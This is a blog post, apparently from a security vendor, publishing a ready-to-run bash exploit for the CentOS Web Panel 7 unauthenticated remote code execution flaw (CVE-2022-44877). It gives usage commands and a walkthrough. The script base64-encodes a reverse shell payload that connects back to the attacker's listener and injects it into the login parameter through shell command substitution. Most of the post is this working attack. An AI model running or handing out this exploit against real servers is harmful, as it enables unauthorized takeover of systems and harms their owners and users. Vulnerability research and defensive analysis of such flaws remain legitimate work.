Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877
The script from here:
https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh
How to use the exploitation script:
Run listener:
Make the script executable:
chmod +x CVE-2022-44877Exploit.sh
Run the script:
./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001
Now we received a connection:
You can watch the exploitation script video here:
Code Explanation:
#!/bin/bash
function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}
function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4
payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)
target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})
echo $target_ip
port=$(echo ${target_url} | grep -oP ':\K\d+')
echo $port
curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'
}
if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fiThis script has two main functions: help and exploit.
The help function will be called if the user does not provide the correct number of arguments when running the script.
It will display usage information and an example of how to run the script.
The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.
First,
the script defines the payload, which is a command that creates a reverse shell.
The payload is then encoded in base64.
It then extracts the target IP address from the URL and port number,
and uses the
curlcommand to send a HTTP post request to the target with the payload in thelogin=parameter.The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.
#exploitation #tool #CVE-2022-44877
Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877
Written by
Mohammad Hussam Alzeyyat
Recent Posts
1
Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)
j00sean (https://twitter.com/j00sean) July 11, 20232
CVE-2021-38294: Apache Storm Nimbus Command Injection
Zeyad Abdelazim June 20, 20233
CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization
Mohammad Hussam Alzeyyat June 19, 20234
Have you missed them? The new reports feature is here!
Noa Machter May 14, 20235
CVE-2021-45456 Apache Kylin RCE Exploit
Mohammad Hussam Alzeyyat April 30, 2023
Related Posts
Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)
CVE-2021-38294: Apache Storm Nimbus Command Injection
CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization
Start Closing Security Gaps
- Risk reduction from Day 1
- Fast set-up and deployment
- Unified platform
- Full-featured 14-day trial